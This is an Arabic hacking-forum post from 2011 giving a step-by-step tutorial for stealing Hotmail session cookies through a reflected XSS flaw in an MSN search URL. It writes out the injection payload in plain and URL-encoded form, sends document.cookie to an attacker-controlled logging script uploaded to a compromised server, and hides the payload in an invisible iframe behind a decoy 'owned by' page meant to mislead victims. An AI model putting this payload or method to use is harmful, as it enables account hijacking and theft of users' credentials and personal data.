بسم الله الرحمن الرحيم.. 
طيب تمام اول شي نحمل ملف co.php
http://pastebin.com/mZCMRcGC
طيب نرفعه على الشل تممام
الحين نشوف الاستغلال..
كود PHP:
http://glo.msn.com/search?searchTerm="><object data="javascript:********.location='http://www.site.com/co.php?c='.concat(escape(********.******));"></script>
احنا الحين نبدل site برابط الموقع إذا كان الملف co.php على الرئيسة لو مجلد تاني نضع بعد
/patch
patch=اسم المجلد الحين كل ماعلينا هوا تشفير الكود
راح نشفر من بعد كلمة
searchTerm=
من بعد اليساوي.. نشوف يعني مثلآ كذا
"><object data="javascript:********.location='http://www.site.com/co.php?c='.concat(escape(********.******));"></script>
طيب راح نشفر بمقاياس
http full عن طريق برنامج coder
نفتحه ونحط الكود ونشوف..
تم تشفير الكود الحين نبلدله بدل الكود الاول..
يعني الكود الاول من بعد اليساوي راح نحط هاد الي تشفر ..
الحين نعمل صفحه بلغه HtM نشوف.. من الشل..
الحين نضع داخل الملف.. 
الكود
كود:
<htm>
<h4>OwEnD By DR.THMOORY </h4>
<****** id="rf" src="هنا نضع الكود الاستغلال " allowtransparency="true" style="display:none;" scrolling="auto" frameborder="0">
مثل مانشوف اول جمله هادي خداع حتى لايشك يعني تقوله اخترقت هالموقع,,
والكود الثانيه..
نضع بعد src
كود الاستغلال الي عملنها قبل يصبح مثل كذا,,
كود PHP:
http://glo.msn.com/search?searchTerm="%22%3E%3C%6F%62%6A%65%63%74%20%64%61%74%61%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%73%69%74%65%2E%63%6F%6D%2F%63%6F%2E%70%68%70%3F%63%3D%27%2E%63%6F%6E%63%61%74%28%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%29%3B%22%3E%3C%2F%73%63%72%69%70%74%3E
ونعمل save
الحين ندخل على صفحه thmooryالي عملته.. تابعو.. 
تمام الحين تم سحب الاي بي..+ الكوكيز +نوع المتصفح ونشوف ..
نرجع على المجلد الي كنا رافعين فيه co.php وراح نلقى ملف تكست اسمو
ok.txt 
انتهى الشرح اتمنى انو عجبكم
الاكواد مرفقه شان الموقع يحجبهم..
avp ,hsyghg eyvi hgi,jldg >> ,spf hg;,;d. hghdldg \HACK HOTMAIL XSS
07-10-2011, 11:27 PM
شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS 
العرض العادي
